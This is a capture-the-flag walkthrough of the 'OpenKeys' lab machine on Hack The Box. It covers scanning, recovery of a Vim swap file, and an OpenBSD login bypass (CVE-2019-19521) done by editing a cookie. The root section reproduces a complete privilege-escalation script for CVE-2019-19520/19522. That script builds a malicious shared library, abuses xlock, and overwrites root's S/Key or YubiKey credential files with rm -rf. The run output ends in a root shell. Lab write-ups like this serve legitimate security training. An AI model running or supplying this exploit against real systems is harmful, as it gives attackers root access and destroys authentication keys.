Enumeration
Let's start Rust Scan
┌──(RajSec㉿kali)-[~/Desktop/htb/openkeys] └─$ rustscan -t 1500 10.10.10.199 -r 1-65535 --ulimit 5000 Faster Nmap scanning with Rust. Open 10.10.10.199:22 Open 10.10.10.199:80 [~] Starting Nmap [>] The Nmap command to be run is nmap -vvv -p 22,80 10.10.10.199 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-12 11:42 IST Initiating Ping Scan at 11:42 Scanning 10.10.10.199 [2 ports] Completed Ping Scan at 11:42, 0.24s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 11:42 Completed Parallel DNS resolution of 1 host. at 11:42, 0.00s elapsed DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating Connect Scan at 11:42 Scanning 10.10.10.199 [2 ports] Discovered open port 22/tcp on 10.10.10.199 Discovered open port 80/tcp on 10.10.10.199 Completed Connect Scan at 11:42, 0.42s elapsed (2 total ports) Nmap scan report for 10.10.10.199 Host is up, received syn-ack (0.28s latency). Scanned at 2020-10-12 11:42:08 IST for 0s PORT STATE SERVICE REASON 22/tcp open ssh syn-ack 80/tcp open http syn-ack Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.78 seconds
Port 22 for ssh and 80 fot http are open
Opening 10.10.10.199 redirects me to a login page
Wappalyzer Shows website is running PHP
Now Let's scan directories
┌──(RajSec㉿kali)-[~/Desktop/bug/dirsearch]
└─$ ./dirsearch.py -u 10.10.10.199 -e php
_|. _ _ _ _ _ _|_ v0.3.9
(_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: GET | Threads: 20 | Wordlist size: 6707
301 443B http://10.10.10.199:80/js -> REDIRECTS TO: http://10.10.10.199/js/
301 443B http://10.10.10.199:80/css -> REDIRECTS TO: http://10.10.10.199/css/
301 443B http://10.10.10.199:80/fonts -> REDIRECTS TO: http://10.10.10.199/fonts/
301 443B http://10.10.10.199:80/images -> REDIRECTS TO: http://10.10.10.199/images/
301 443B http://10.10.10.199:80/includes -> REDIRECTS TO: http://10.10.10.199/includes/
200 711B http://10.10.10.199:80/includes/
200 5KB http://10.10.10.199:80/index.php
200 96B http://10.10.10.199:80/index.html
200 5KB http://10.10.10.199:80/index.php/login/
After finding every directory found some intresting file in /includes directory
Let's wget file with auth.php.swp
┌──(RajSec㉿kali)-[~/Desktop/htb/openkeys]
└─$ wget http://10.10.10.199/includes/auth.php.swp
--2020-10-12 12:19:54-- http://10.10.10.199/includes/auth.php.swp
Connecting to 10.10.10.199:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘auth.php.swp’
auth.php.swp [ <====> ] 12.00K 18.8KB/s in 0.6s
2020-10-12 12:19:56 (18.8 KB/s) - ‘auth.php.swp’ saved [12288]
┌──(RajSec㉿kali)-[~/Desktop/htb/openkeys]
└─$ file auth.php.swp
auth.php.swp: Vim swap file, version 8.1, pid 49850, user jennifer, host openkeys.htb, file /var/www/htdocs/includes/auth.php
The swap file shows user jennifer and file type
Recovering original file from swap file
┌──(RajSec㉿kali)-[~/Desktop/htb/openkeys]
└─$ vim -r auth.php.swp
Using swap file "auth.php.swp"
"/var/www/htdocs/includes/auth.php" [New DIRECTORY]
Recovery completed. You should check if everything is OK.
(You might want to write out this file under another name
and run diff with the original file to check for changes)
You may want to delete the .swp file now.
Press ENTER or type command to continue_
auth.php code
$session_timeout)
{
close_session();
return False;
}
else
{
// Session is active, update last activity time and return True
$_SESSION['last_activity'] = $time;
return True;
}
}
else
{
return False;
}
function init_session()
$_SESSION["logged_in"] = True;
$_SESSION["login_time"] = $_SERVER['REQUEST_TIME'];
$_SESSION["last_activity"] = $_SERVER['REQUEST_TIME'];
$_SESSION["remote_addr"] = $_SERVER['REMOTE_ADDR'];
$_SESSION["user_agent"] = $_SERVER['HTTP_USER_AGENT'];
$_SESSION["username"] = $_REQUEST['username'];
function close_session()
session_unset();
session_destroy();
session_start();
?>
This shows check_auth file from auth_helpers direcory. Let's wget it too.
┌──(RajSec㉿kali)-[~/Desktop/htb/openkeys]
└─$ wget http://10.10.10.199/auth_helpers/check_auth
--2020-10-12 12:44:37-- http://10.10.10.199/auth_helpers/check_auth
Connecting to 10.10.10.199:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12288 (12K) [application/octet-stream]
Saving to: ‘check_auth’
check_auth 100%[========================================================================>] 12.00K 20.9KB/s in 0.6s
2020-10-12 12:44:39 (20.9 KB/s) - ‘check_auth’ saved [12288/12288]
┌──(RajSec㉿kali)-[~/Desktop/htb/openkeys]
└─$ file check_auth
check_auth: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /usr/libexec/ld.so, for OpenBSD, not stripped
check_auth is a Executable file
Executing check_auth gives no such file or directory
┌──(RajSec㉿kali)-[~/Desktop/htb/openkeys] └─$ ./check_auth zsh: no such file or directory: ./check_auth
OpenBSD Auth Bypass
After some research I found amazing blogpost secpod.com
As they mentioned in blog there are four vulnerabilities
- CVE-2019-19519 (Local privilege escalation)
- CVE-2019-19520 (Local privilege escalation)
- CVE-2019-19521 (Authentication Bypass)
- CVE-2019-19522 (Local privilege escalation)
According to blog using -schallenge and with randon password gives successful login but with error OpenSSH Key not found for user -schallenge
Its time to change the username cookie with value jennifer
Reresh the page and login again
Getting User
┌──(RajSec㉿kali)-[~/Desktop/htb/openkeys]
└─$ ssh -i sshkey jennifer@10.10.10.199
Last login: Wed Jun 24 09:31:16 2020 from 10.10.14.2
OpenBSD 6.6 (GENERIC) #353: Sat Oct 12 10:45:56 MDT 2019
Welcome to OpenBSD: The proactively secure Unix-like operating system.
Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code. With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.
openkeys$ id
uid=1001(jennifer) gid=1001(jennifer) groups=1001(jennifer), 0(wheel)
openkeys$ whoami
jennifer
openkeys$ ls
user.txt
openkeys$ wc -c user.txt
33 user.txt
openkeys$
Gaining Root
We are going to use CVE-2019-19522: Local privilege escalation via S/Key and YubiKey as mentioned in the blog
#!/bin/sh
echo "openbsd-authroot (CVE-2019-19520 / CVE-2019-19522)"
echo "[*] checking system ..."
if grep auth= /etc/login.conf | fgrep -Ev "^#" | grep -q yubikey ; then
echo "[*] system supports YubiKey authentication"
target='yubikey'
elif grep auth= /etc/login.conf | fgrep -Ev "^#" | grep -q skey ; then
echo "[*] system supports S/Key authentication"
target='skey'
if ! test -d /etc/skey/ ; then
echo "[-] S/Key authentication enabled, but has not been initialized"
exit 1
fi
else
echo "[-] system does not support S/Key / YubiKey authentication"
exit 1
fi
echo "[*] id: \`id\`"
echo "[*] compiling ..."
cat > swrast_dri.c << "EOF"
#include
#include
#include
static void __attribute__ ((constructor)) _init (void) {
gid_t rgid, egid, sgid;
if (getresgid(&rgid, &egid, &sgid) != 0) _exit(__LINE__);
if (setresgid(sgid, sgid, sgid) != 0) _exit(__LINE__);
char * const argv[] = { _PATH_KSHELL, NULL };
execve(argv[0], argv, NULL);
_exit(__LINE__);
}
EOF
cc -fpic -shared -s -o swrast_dri.so swrast_dri.c
rm -rf swrast_dri.c
echo "[*] running Xvfb ..."
display=":66"
env -i /usr/X11R6/bin/Xvfb $display -cc 0 &
echo "[*] testing for CVE-2019-19520 ..."
group=$(echo id -gn | env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display)
if [ "$group" = "auth" ]; then
echo "[+] success! we have auth group permissions"
else
echo "[-] failed to acquire auth group permissions"
exit 1
fi
# uncomment to drop to a shell with auth group permissions
#env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display ; exit
echo
echo "WARNING: THIS EXPLOIT WILL DELETE KEYS. YOU HAVE 5 SECONDS TO CANCEL (CTRL+C)."
echo
sleep 5
if [ "$target" = "skey" ]; then
echo "[*] trying CVE-2019-19522 (S/Key) ..."
echo "rm -rf /etc/skey/root ; echo 'root md5 0100 obsd91335 8b6d96e0ef1b1c21' > /etc/skey/root ; chmod 0600 /etc/skey/root" | env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display
rm -rf swrast_dri.so
echo "Your password is: EGG LARD GROW HOG DRAG LAIN"
env -i TERM=vt220 su -l -a skey
fi
if [ "$target" = "yubikey" ]; then
echo "[*] trying CVE-2019-19522 (YubiKey) ..."
echo "rm -rf /var/db/yubikey/root.* ; echo 32d32ddfb7d5 > /var/db/yubikey/root.uid ; echo 554d5eedfd75fb96cc74d52609505216 > /var/db/yubikey/root.key" | env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display
rm -rf swrast_dri.so
echo "Your password is: krkhgtuhdnjclrikikklulkldlutreul"
env -i TERM=vt220 su -l -a yubikey
fi
It will prompt for password then enter as shown in code
EGG LARD GROW HOG DRAG LAIN
openkeys$ sh openbsd-privesc.sh
openbsd-authroot (CVE-2019-19520 / CVE-2019-19522)
[*] checking system ...
[*] system supports S/Key authentication
[*] id: uid=1001(jennifer) gid=1001(jennifer) groups=1001(jennifer), 0(wheel)
[*] compiling ...
[*] running Xvfb ...
[*] testing for CVE-2019-19520 ...
_XSERVTransmkdir: ERROR: euid != 0,directory /tmp/.X11-unix will not be created.
[+] success! we have auth group permissions
WARNING: THIS EXPLOIT WILL DELETE KEYS. YOU HAVE 5 SECONDS TO CANCEL (CTRL+C).
[*] trying CVE-2019-19522 (S/Key) ...
Your password is: EGG LARD GROW HOG DRAG LAIN
otp-md5 99 obsd91335
S/Key Password:
openkeys# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
openkeys# whoami
root
openkeys# hostname
openkeys.htb
openkeys# wc -c /root/root.txt
33 /root/root.txt
openkeys#
Yup...! We rooted
0 Comments